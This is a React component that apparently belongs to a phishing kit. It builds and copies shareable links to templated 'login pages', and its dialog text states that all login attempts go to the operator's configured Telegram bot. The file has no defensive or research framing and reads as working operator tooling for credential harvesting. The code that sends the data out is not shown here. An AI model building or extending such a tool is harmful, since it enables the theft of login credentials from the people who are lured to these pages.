import React from 'react';
import { LoginTemplate } from '@/lib/loginData';
import { toast } from 'sonner';
import { Input } from '@/components/ui/input';
import { Button } from '@/components/ui/button';
import {
  Dialog,
  DialogContent,
  DialogDescription,
  DialogHeader,
  DialogTitle,
  DialogTrigger,
} from "@/components/ui/dialog";
import { useCredentials } from '@/contexts/CredentialsContext';

interface ShareDialogProps {
  children: React.ReactNode;
  template: LoginTemplate;
}

export const ShareDialog: React.FC<ShareDialogProps> = ({ children, template }) => {
  const { telegramConfig } = useCredentials();
  const shareUrl = `${window.location.origin}/login/${template.id}?configId=${telegramConfig.configId}`;

  const handleShare = async () => {
    try {
      await navigator.clipboard.writeText(shareUrl);
      toast.success('Link copied to clipboard');
    } catch (err) {
      toast.error('Failed to copy link');
    }
  };

  return (
    <Dialog>
      <DialogTrigger asChild>
        {children}
      </DialogTrigger>
      <DialogContent>
        <DialogHeader>
          <DialogTitle>Share {template.name} Login Page</DialogTitle>
          <DialogDescription>
            Copy the link below to share this login page. All login attempts will be sent to your configured Telegram bot.
          </DialogDescription>
        </DialogHeader>
        <div className="flex gap-2">
          <Input 
            value={shareUrl}
            readOnly
            onClick={(e) => (e.target as HTMLInputElement).select()}
          />
          <Button onClick={handleShare}>
            Copy
          </Button>
        </div>
      </DialogContent>
    </Dialog>
  );
};